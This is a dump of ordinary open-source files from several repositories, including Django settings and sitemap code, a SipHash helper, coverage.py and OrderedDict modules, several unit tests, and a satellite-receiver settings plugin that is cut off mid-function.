repo_name (string, 5-100 chars) | ref (string, 12-67 chars) | path (string, 4-244 chars) | copies (string, 1-8 chars) | content (string, 0-1.05M chars, nullable)
---|---|---|---|---
calculuscowboy/cookiecutter-django | refs/heads/master | {{cookiecutter.project_slug}}/config/settings/local.py | 2 | # -*- coding: utf-8 -*-
"""
Local settings
- Run in Debug mode
{% if cookiecutter.use_mailhog == 'y' and cookiecutter.use_docker == 'y' %}
- Use mailhog for emails
{% else %}
- Use console backend for emails
{% endif %}
- Add Django Debug Toolbar
- Add django-extensions as app
"""
import socket
import os
from .common import * # noqa
# DEBUG
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', default=True)
TEMPLATES[0]['OPTIONS']['debug'] = DEBUG
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key is only used for development and testing.
SECRET_KEY = env('DJANGO_SECRET_KEY', default='CHANGEME!!!')
# Mail settings
# ------------------------------------------------------------------------------
EMAIL_PORT = 1025
{% if cookiecutter.use_mailhog == 'y' and cookiecutter.use_docker == 'y' %}
EMAIL_HOST = env("EMAIL_HOST", default='mailhog')
{% else %}
EMAIL_HOST = 'localhost'
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND',
default='django.core.mail.backends.console.EmailBackend')
{% endif %}
# CACHING
# ------------------------------------------------------------------------------
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': ''
}
}
# django-debug-toolbar
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
INSTALLED_APPS += ('debug_toolbar', )
INTERNAL_IPS = ['127.0.0.1', '10.0.2.2', ]
# trick to enable the debug toolbar when developing with Docker: add the
# presumed host gateway (the container IP with its final digit swapped for '1')
if os.environ.get('USE_DOCKER') == 'yes':
ip = socket.gethostbyname(socket.gethostname())
INTERNAL_IPS += [ip[:-1] + "1"]
DEBUG_TOOLBAR_CONFIG = {
'DISABLE_PANELS': [
'debug_toolbar.panels.redirects.RedirectsPanel',
],
'SHOW_TEMPLATE_CONTEXT': True,
}
# django-extensions
# ------------------------------------------------------------------------------
INSTALLED_APPS += ('django_extensions', )
# TESTING
# ------------------------------------------------------------------------------
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
{% if cookiecutter.use_celery == 'y' %}
########## CELERY
# In development, all tasks will be executed locally by blocking until the task returns
CELERY_ALWAYS_EAGER = True
########## END CELERY
{% endif %}
# Your local stuff: Below this line define 3rd party library settings
# ------------------------------------------------------------------------------
|
ray306/expy | refs/heads/master | test/show_text.py | 1 | # coding:utf-8
##### package test #####
import sys
sys.path = ['../../']+sys.path
################
from expy import * # Import the needed functions
start() # Initiate the experiment environment
'''General usage'''
# Draw text on the canvas
drawText('Hello world!')
show(2) # Display current canvas
''''''
# Draw text on the canvas
w, h = drawText('Hello world!', show_now=False)
drawRect(w, h, color=C_red, fill=False, show_now=False)
show(2) # Display current canvas
# Draw text on the canvas, anchored at the left-bottom corner
drawText('Hello! world!', anchor_x='left', anchor_y='bottom')
show(2) # Display current canvas
# Draw text on the canvas, with given fontsize
drawText('Hello world!', size=50)
show(2) # Display current canvas
# Draw text on the canvas, with given font color
drawText('Hello world!', color=C_red)
show(2) # Display current canvas
# # Draw text on the canvas, with given angle
# drawText('Hello world!', rotation=45)
# show(2) # Display current canvas
# Draw text on the canvas, with a given center position
drawText('Hello! world!', x=-0.5, y=0.0)
show(2) # Display current canvas
drawText('Hello\nworld\n!') # Draw multi-line text on the canvas
show(2) # Display current canvas
# Display text on a new slide; it's functionally equal to clear+drawText+show
textSlide('Hello\nworld\nagain!')
|
Sjors/bitcoin | refs/heads/master | test/functional/test_framework/siphash.py | 91 | #!/usr/bin/env python3
# Copyright (c) 2016-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Specialized SipHash-2-4 implementations.
This implements SipHash-2-4 for 256-bit integers.
"""
def rotl64(n, b):
return n >> (64 - b) | (n & ((1 << (64 - b)) - 1)) << b
def siphash_round(v0, v1, v2, v3):
v0 = (v0 + v1) & ((1 << 64) - 1)
v1 = rotl64(v1, 13)
v1 ^= v0
v0 = rotl64(v0, 32)
v2 = (v2 + v3) & ((1 << 64) - 1)
v3 = rotl64(v3, 16)
v3 ^= v2
v0 = (v0 + v3) & ((1 << 64) - 1)
v3 = rotl64(v3, 21)
v3 ^= v0
v2 = (v2 + v1) & ((1 << 64) - 1)
v1 = rotl64(v1, 17)
v1 ^= v2
v2 = rotl64(v2, 32)
return (v0, v1, v2, v3)
def siphash256(k0, k1, h):
n0 = h & ((1 << 64) - 1)
n1 = (h >> 64) & ((1 << 64) - 1)
n2 = (h >> 128) & ((1 << 64) - 1)
n3 = (h >> 192) & ((1 << 64) - 1)
v0 = 0x736f6d6570736575 ^ k0
v1 = 0x646f72616e646f6d ^ k1
v2 = 0x6c7967656e657261 ^ k0
v3 = 0x7465646279746573 ^ k1 ^ n0
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n0
v3 ^= n1
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n1
v3 ^= n2
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n2
v3 ^= n3
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= n3
v3 ^= 0x2000000000000000
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0 ^= 0x2000000000000000
v2 ^= 0xFF
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
v0, v1, v2, v3 = siphash_round(v0, v1, v2, v3)
return v0 ^ v1 ^ v2 ^ v3
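# A minimal determinism check (hypothetical key/value pair, not an official
# test vector): siphash256 maps a 256-bit integer to a 64-bit digest, so
# equal inputs under the same keys must produce equal digests.
#
# digest = siphash256(0x0706050403020100, 0x0F0E0D0C0B0A0908, 1 << 255)
# assert digest == siphash256(0x0706050403020100, 0x0F0E0D0C0B0A0908, 1 << 255)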
|
ds-hwang/chromium-crosswalk | refs/heads/master | third_party/pycoverage/coverage/__init__.py | 208 | """Code coverage measurement for Python.
Ned Batchelder
http://nedbatchelder.com/code/coverage
"""
from coverage.version import __version__, __url__
from coverage.control import coverage, process_startup
from coverage.data import CoverageData
from coverage.cmdline import main, CoverageScript
from coverage.misc import CoverageException
# Module-level functions. The original API to this module was based on
# functions defined directly in the module, with a singleton of the coverage()
# class. That design hampered programmability, so the current api uses
# explicitly-created coverage objects. But for backward compatibility, here we
# define the top-level functions to create the singleton when they are first
# called.
# Singleton object for use with module-level functions. The singleton is
# created as needed when one of the module-level functions is called.
_the_coverage = None
def _singleton_method(name):
"""Return a function to the `name` method on a singleton `coverage` object.
The singleton object is created the first time one of these functions is
called.
"""
# Disable pylint msg W0612, because a bunch of variables look unused, but
# they're accessed via locals().
# pylint: disable=W0612
def wrapper(*args, **kwargs):
"""Singleton wrapper around a coverage method."""
global _the_coverage
if not _the_coverage:
_the_coverage = coverage(auto_data=True)
return getattr(_the_coverage, name)(*args, **kwargs)
import inspect
meth = getattr(coverage, name)
args, varargs, kw, defaults = inspect.getargspec(meth)
argspec = inspect.formatargspec(args[1:], varargs, kw, defaults)
docstring = meth.__doc__
wrapper.__doc__ = ("""\
A first-use-singleton wrapper around coverage.%(name)s.
This wrapper is provided for backward compatibility with legacy code.
New code should use coverage.%(name)s directly.
%(name)s%(argspec)s:
%(docstring)s
""" % locals()
)
return wrapper
# Define the module-level functions.
use_cache = _singleton_method('use_cache')
start = _singleton_method('start')
stop = _singleton_method('stop')
erase = _singleton_method('erase')
exclude = _singleton_method('exclude')
analysis = _singleton_method('analysis')
analysis2 = _singleton_method('analysis2')
report = _singleton_method('report')
annotate = _singleton_method('annotate')
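# Legacy usage sketch for the module-level API defined above (new code
# should create an explicit coverage() object instead):
#
# import coverage
# coverage.start()   # the first call lazily creates the singleton
# ...                # run the code being measured
# coverage.stop()
# coverage.report()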
# On Windows, we encode and decode deep enough that something goes wrong and
# the encodings.utf_8 module is loaded and then unloaded, I don't know why.
# Adding a reference here prevents it from being unloaded. Yuk.
import encodings.utf_8
# Because of the "from coverage.control import fooey" lines at the top of the
# file, there's an entry for coverage.coverage in sys.modules, mapped to None.
# This makes some inspection tools (like pydoc) unable to find the class
# coverage.coverage. So remove that entry.
import sys
try:
del sys.modules['coverage.coverage']
except KeyError:
pass
# COPYRIGHT AND LICENSE
#
# Copyright 2001 Gareth Rees. All rights reserved.
# Copyright 2004-2013 Ned Batchelder. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDERS AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
# DAMAGE.
|
signed/intellij-community | refs/heads/master | python/testData/copyPaste/IndentTabIncrease.src.py | 75 | <selection>print "Line 2"
</selection><caret>
class Test:
def __init__(self):
print "Line 1"
|
chintak/scikit-image | refs/heads/placeholder | skimage/io/tests/test_colormixer.py | 40 | from numpy.testing import (assert_array_equal,
assert_almost_equal,
assert_equal,
assert_array_almost_equal,
)
import numpy as np
import skimage.io._plugins._colormixer as cm
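# Base class for the add/multiply mixer tests below; subclasses supply `op`
# (the compiled color-mixer routine under test), `py_op` (the NumPy reference
# implementation), and operand values that stay in range or force clipping.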
class ColorMixerTest(object):
def setup(self):
self.state = np.ones((18, 33, 3), dtype=np.uint8) * 200
self.img = np.zeros_like(self.state)
def test_basic(self):
self.op(self.img, self.state, 0, self.positive)
assert_array_equal(self.img[..., 0],
self.py_op(self.state[..., 0], self.positive))
def test_clip(self):
self.op(self.img, self.state, 0, self.positive_clip)
assert_array_equal(self.img[..., 0],
np.ones_like(self.img[..., 0]) * 255)
def test_negative(self):
self.op(self.img, self.state, 0, self.negative)
assert_array_equal(self.img[..., 0],
self.py_op(self.state[..., 0], self.negative))
def test_negative_clip(self):
self.op(self.img, self.state, 0, self.negative_clip)
assert_array_equal(self.img[..., 0],
np.zeros_like(self.img[..., 0]))
class TestColorMixerAdd(ColorMixerTest):
op = cm.add
py_op = np.add
positive = 50
positive_clip = 56
negative = -50
negative_clip = -220
class TestColorMixerMul(ColorMixerTest):
op = cm.multiply
py_op = np.multiply
positive = 1.2
positive_clip = 2
negative = 0.5
negative_clip = -0.5
class TestColorMixerBright(object):
def setup(self):
self.state = np.ones((18, 33, 3), dtype=np.uint8) * 200
self.img = np.zeros_like(self.state)
def test_brightness_pos(self):
cm.brightness(self.img, self.state, 1.25, 1)
assert_array_equal(self.img, np.ones_like(self.img) * 251)
def test_brightness_neg(self):
cm.brightness(self.img, self.state, 0.5, -50)
assert_array_equal(self.img, np.ones_like(self.img) * 50)
def test_brightness_pos_clip(self):
cm.brightness(self.img, self.state, 2, 0)
assert_array_equal(self.img, np.ones_like(self.img) * 255)
def test_brightness_neg_clip(self):
cm.brightness(self.img, self.state, 0, 0)
assert_array_equal(self.img, np.zeros_like(self.img))
class TestColorMixer(object):
def setup(self):
self.state = np.ones((18, 33, 3), dtype=np.uint8) * 50
self.img = np.zeros_like(self.state)
def test_sigmoid(self):
import math
alpha = 1.5
beta = 1.5
c1 = 1 / (1 + math.exp(beta))
c2 = 1 / (1 + math.exp(beta - alpha)) - c1
state = self.state / 255.
cm.sigmoid_gamma(self.img, self.state, alpha, beta)
img = 1 / (1 + np.exp(beta - state * alpha))
img = np.asarray((img - c1) / c2 * 255, dtype='uint8')
assert_almost_equal(img, self.img)
def test_gamma(self):
gamma = 1.5
cm.gamma(self.img, self.state, gamma)
img = np.asarray(((self.state / 255.)**(1 / gamma)) * 255,
dtype='uint8')
assert_array_almost_equal(img, self.img)
def test_rgb_2_hsv(self):
r = 255
g = 0
b = 0
h, s, v = cm.py_rgb_2_hsv(r, g, b)
assert_almost_equal(np.array([h]), np.array([0]))
assert_almost_equal(np.array([s]), np.array([1]))
assert_almost_equal(np.array([v]), np.array([1]))
def test_hsv_2_rgb(self):
h = 0
s = 1
v = 1
r, g, b = cm.py_hsv_2_rgb(h, s, v)
assert_almost_equal(np.array([r]), np.array([255]))
assert_almost_equal(np.array([g]), np.array([0]))
assert_almost_equal(np.array([b]), np.array([0]))
def test_hsv_add(self):
cm.hsv_add(self.img, self.state, 360, 0, 0)
assert_almost_equal(self.img, self.state)
def test_hsv_add_clip_neg(self):
cm.hsv_add(self.img, self.state, 0, 0, -1)
assert_equal(self.img, np.zeros_like(self.state))
def test_hsv_add_clip_pos(self):
cm.hsv_add(self.img, self.state, 0, 0, 1)
assert_equal(self.img, np.ones_like(self.state) * 255)
def test_hsv_mul(self):
cm.hsv_multiply(self.img, self.state, 360, 1, 1)
assert_almost_equal(self.img, self.state)
def test_hsv_mul_clip_neg(self):
cm.hsv_multiply(self.img, self.state, 0, 0, 0)
assert_equal(self.img, np.zeros_like(self.state))
if __name__ == "__main__":
from numpy.testing import run_module_suite
run_module_suite()
|
gracehyemin/is210-week-04-warmup | refs/heads/master | tests/test_task_04.py | 28 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests Task 04."""
# Import Python libs
import unittest
import task_04
class Task04TestCase(unittest.TestCase):
"""Test cases for Task 04."""
testmap = {
'not_enough_litterboxes': [2, 1, True, True],
'plenty_of_litterboxes': [1, 2, True, False],
'no_catfood': [1, 2, False, True],
'same_litterboxes': [1, 1, True, False],
}
def test_positional_args(self):
"""
Tests that too_many_kittens has the correct positional arguments.
"""
for case, params in self.testmap.iteritems():
result = task_04.too_many_kittens(*params[:3])
msg = 'Tried {} kittens, {} litterboxes and {} food, expected {}'
msg = msg.format(*params)
self.assertIs(result, params[3], msg)
def test_keyword_args(self):
"""
Tests that too_many_kittens has the correct keyword arguments.
"""
for case, params in self.testmap.iteritems():
result = task_04.too_many_kittens(kittens=params[0],
litterboxes=params[1],
catfood=params[2])
msg = 'Tried {} kittens, {} litterboxes, and {} food, expected {}'
msg = msg.format(*params)
self.assertIs(result, params[3], msg)
if __name__ == '__main__':
unittest.main()
|
flotre/Sick-Beard | refs/heads/development | lib/requests/packages/urllib3/packages/ordered_dict.py | 1093 | # Backport of OrderedDict() class that runs on Python 2.4, 2.5, 2.6, 2.7 and pypy.
# Passes Python2.7's test suite and incorporates all the latest updates.
# Copyright 2009 Raymond Hettinger, released under the MIT License.
# http://code.activestate.com/recipes/576693/
try:
from thread import get_ident as _get_ident
except ImportError:
from dummy_thread import get_ident as _get_ident
try:
from _abcoll import KeysView, ValuesView, ItemsView
except ImportError:
pass
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as for regular dictionaries.
# The internal self.__map dictionary maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# Each link is stored as a list of length three: [PREV, NEXT, KEY].
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. Signature is the same as for
regular dictionaries, but keyword arguments are not recommended
because their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link which goes at the end of the linked
# list, and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which is
# then removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, key = self.__map.pop(key)
link_prev[1] = link_next
link_next[0] = link_prev
def __iter__(self):
'od.__iter__() <==> iter(od)'
root = self.__root
curr = root[1]
while curr is not root:
yield curr[2]
curr = curr[1]
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
root = self.__root
curr = root[0]
while curr is not root:
yield curr[2]
curr = curr[0]
def clear(self):
'od.clear() -> None. Remove all items from od.'
try:
for node in self.__map.itervalues():
del node[:]
root = self.__root
root[:] = [root, root, None]
self.__map.clear()
except AttributeError:
pass
dict.clear(self)
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues() -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems() -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
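# Usage sketch showing the insertion-order guarantee (keys come back in the
# order they were added, unlike a plain dict on the Pythons this targets):
#
# od = OrderedDict([('b', 1), ('a', 2)])
# od.keys()     # -> ['b', 'a']
# od.popitem()  # -> ('a', 2); LIFO by default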
|
Serg09/socorro | refs/heads/master | socorro/unittest/external/postgresql/test_skiplist.py | 11 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from nose.plugins.attrib import attr
from nose.tools import eq_, ok_, assert_raises
from socorro.external import MissingArgumentError, DatabaseError
from socorro.external.postgresql.skiplist import SkipList
from unittestbase import PostgreSQLTestCase
#==============================================================================
@attr(integration='postgres') # for nosetests
class IntegrationTestSkipList(PostgreSQLTestCase):
"""Test socorro.external.postgresql.crashes.Crashes class. """
#--------------------------------------------------------------------------
def setUp(self):
"""Set up this test class by populating the reports table with fake
data. """
super(IntegrationTestSkipList, self).setUp()
cursor = self.connection.cursor()
cursor.execute("""
TRUNCATE skiplist
CASCADE
""")
cursor.execute("""
INSERT INTO skiplist (category, rule)
VALUES
('prefix', 'arena_.*'),
('prefix', 'CrashInJS'),
('irrelevant', 'ashmem'),
('irrelevant', 'CxThrowException'),
('line_number', 'signatures_with_line_numbers_re')
;
""")
self.connection.commit()
cursor.close()
#--------------------------------------------------------------------------
def tearDown(self):
"""Clean up the database, delete tables and functions. """
cursor = self.connection.cursor()
cursor.execute("""
TRUNCATE skiplist
CASCADE
""")
self.connection.commit()
cursor.close()
super(IntegrationTestSkipList, self).tearDown()
#--------------------------------------------------------------------------
def test_get(self):
skiplist = SkipList(config=self.config)
params = {
}
res_expected = {
"hits": [
# Note: sort is case-insensitive
{
"category": "irrelevant",
"rule": "ashmem",
},
{
"category": "irrelevant",
"rule": "CxThrowException",
},
{
"category": "line_number",
"rule": "signatures_with_line_numbers_re",
},
{
"category": "prefix",
"rule": "arena_.*",
},
{
"category": "prefix",
"rule": "CrashInJS",
},
],
"total": 5
}
res = skiplist.get(**params)
eq_(res, res_expected)
def test_get_with_optional_filtering(self):
skiplist = SkipList(config=self.config)
# filter by category
params = {
'category': 'irrelevant'
}
res_expected = {
"hits": [
{
"category": "irrelevant",
"rule": "ashmem",
},
{
"category": "irrelevant",
"rule": "CxThrowException",
},
],
"total": 2
}
res = skiplist.get(**params)
eq_(res, res_expected)
# filter by rule
params = {
'rule': 'ashmem'
}
res_expected = {
"hits": [
{
"category": "irrelevant",
"rule": "ashmem",
},
],
"total": 1
}
res = skiplist.get(**params)
eq_(res, res_expected)
# filter by both
params = {
'category': 'irrelevant',
'rule': 'ashmem'
}
res_expected = {
"hits": [
{
"category": "irrelevant",
"rule": "ashmem",
},
],
"total": 1
}
res = skiplist.get(**params)
eq_(res, res_expected)
def test_post(self):
skiplist = SkipList(config=self.config)
assert_raises(MissingArgumentError, skiplist.post)
assert_raises(
MissingArgumentError,
skiplist.post,
category='something'
)
assert_raises(
MissingArgumentError,
skiplist.post,
rule='something'
)
# because of an integrity error since it already exists
assert_raises(
DatabaseError,
skiplist.post,
category='prefix', rule='CrashInJS'
)
ok_(
skiplist.post(category='suffix', rule='Erik*tiny*font')
)
cursor = self.connection.cursor()
cursor.execute("""
select * from skiplist where category=%s and rule=%s
""", ('suffix', 'Erik*tiny*font'))
first, = cursor.fetchall()
eq_(first[0], 'suffix')
eq_(first[1], 'Erik*tiny*font')
def test_delete(self):
skiplist = SkipList(config=self.config)
assert_raises(MissingArgumentError, skiplist.delete)
assert_raises(
MissingArgumentError,
skiplist.delete,
category='something'
)
assert_raises(
MissingArgumentError,
skiplist.delete,
rule='something'
)
cursor = self.connection.cursor()
cursor.execute("select count(*) from skiplist")
first, = cursor.fetchall()
count = first[0]
eq_(count, 5)
ok_(skiplist.delete(category='irrelevant', rule='ashmem'))
cursor.execute("select count(*) from skiplist")
first, = cursor.fetchall()
count = first[0]
eq_(count, 4)
cursor.execute("""
select count(*) from skiplist
where category=%s and rule=%s
""", ('irrelevant', 'ashmem'))
first, = cursor.fetchall()
count = first[0]
eq_(count, 0)
ok_(not skiplist.delete(category='neverheard', rule='of'))
|
thodoris/djangoPharma | refs/heads/master | djangoPharma/env/Lib/site-packages/django/contrib/flatpages/sitemaps.py | 729 | from django.apps import apps as django_apps
from django.contrib.sitemaps import Sitemap
from django.core.exceptions import ImproperlyConfigured
class FlatPageSitemap(Sitemap):
def items(self):
if not django_apps.is_installed('django.contrib.sites'):
raise ImproperlyConfigured("FlatPageSitemap requires django.contrib.sites, which isn't installed.")
Site = django_apps.get_model('sites.Site')
current_site = Site.objects.get_current()
return current_site.flatpage_set.filter(registration_required=False)
|
kingvuplus/ops | refs/heads/master | lib/python/Plugins/SystemPlugins/SatelliteEquipmentControl/plugin.py | 34 | from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Plugins.Plugin import PluginDescriptor
from Components.ConfigList import ConfigListScreen
from Components.ActionMap import ActionMap
from Components.config import config
from Components.NimManager import nimmanager as nimmgr
class SecParameterSetup(Screen, ConfigListScreen):
skin = """
<screen position="center,center" size="620,455" title="Satellite equipment setup" >
<widget name="config" position="10,10" size="600,450" />
</screen>"""
def __init__(self, session):
self.skin = SecParameterSetup.skin
self["actions"] = ActionMap(["SetupActions", "MenuActions"],
{
"ok": self.keySave,
"cancel": self.keyCancel,
"menu": self.setDefault,
}, -2)
Screen.__init__(self, session)
self.setTitle(_("Satellite equipment setup"))
list = [
(_("Delay after diseqc reset command"), config.sec.delay_after_diseqc_reset_cmd),
(_("Delay after diseqc peripherial poweron command"), config.sec.delay_after_diseqc_peripherial_poweron_cmd),
(_("Delay after continuous tone disable before diseqc"), config.sec.delay_after_continuous_tone_disable_before_diseqc),
(_("Delay after final continuous tone change"), config.sec.delay_after_final_continuous_tone_change),
(_("Delay after last voltage change"), config.sec.delay_after_final_voltage_change),
(_("Delay between diseqc commands"), config.sec.delay_between_diseqc_repeats),
(_("Delay after last diseqc command"), config.sec.delay_after_last_diseqc_command),
(_("Delay after toneburst"), config.sec.delay_after_toneburst),
(_("Delay after change voltage before switch command"), config.sec.delay_after_change_voltage_before_switch_command),
(_("Delay after enable voltage before switch command"), config.sec.delay_after_enable_voltage_before_switch_command),
(_("Delay between switch and motor command"), config.sec.delay_between_switch_and_motor_command),
(_("Delay after set voltage before measure motor power"), config.sec.delay_after_voltage_change_before_measure_idle_inputpower),
(_("Delay after enable voltage before motor command"), config.sec.delay_after_enable_voltage_before_motor_command),
(_("Delay after motor stop command"), config.sec.delay_after_motor_stop_command),
(_("Delay after voltage change before motor command"), config.sec.delay_after_voltage_change_before_motor_command),
(_("Delay before sequence repeat"), config.sec.delay_before_sequence_repeat),
(_("Motor running timeout"), config.sec.motor_running_timeout),
(_("Motor command retries"), config.sec.motor_command_retries) ]
ConfigListScreen.__init__(self, list)
def setDefault(self):
self.session.openWithCallback(self.setDefaultCallback, MessageBox, _("Set default settings?"), MessageBox.TYPE_YESNO)
def setDefaultCallback(self, answer):
if answer:
config.sec.delay_after_diseqc_reset_cmd.value = 50
config.sec.delay_after_diseqc_peripherial_poweron_cmd.value = 150
config.sec.delay_after_continuous_tone_disable_before_diseqc.value = 25
config.sec.delay_after_final_continuous_tone_change.value = 10
config.sec.delay_after_final_voltage_change.value = 10
config.sec.delay_between_diseqc_repeats.value = 120
config.sec.delay_after_last_diseqc_command.value = 50
config.sec.delay_after_toneburst.value = 50
config.sec.delay_after_change_voltage_before_switch_command.value = 20
config.sec.delay_after_enable_voltage_before_switch_command.value = 200
config.sec.delay_between_switch_and_motor_command.value = 700
config.sec.delay_after_voltage_change_before_measure_idle_inputpower.value = 500
config.sec.delay_after_enable_voltage_before_motor_command.value = 900
config.sec.delay_after_motor_stop_command.value = 500
config.sec.delay_after_voltage_change_before_motor_command.value = 500
config.sec.delay_before_sequence_repeat.value = 70
config.sec.motor_running_timeout.value = 360
config.sec.motor_command_retries.value = 1
config.sec.delay_after_diseqc_reset_cmd.save()
config.sec.delay_after_diseqc_peripherial_poweron_cmd.save()
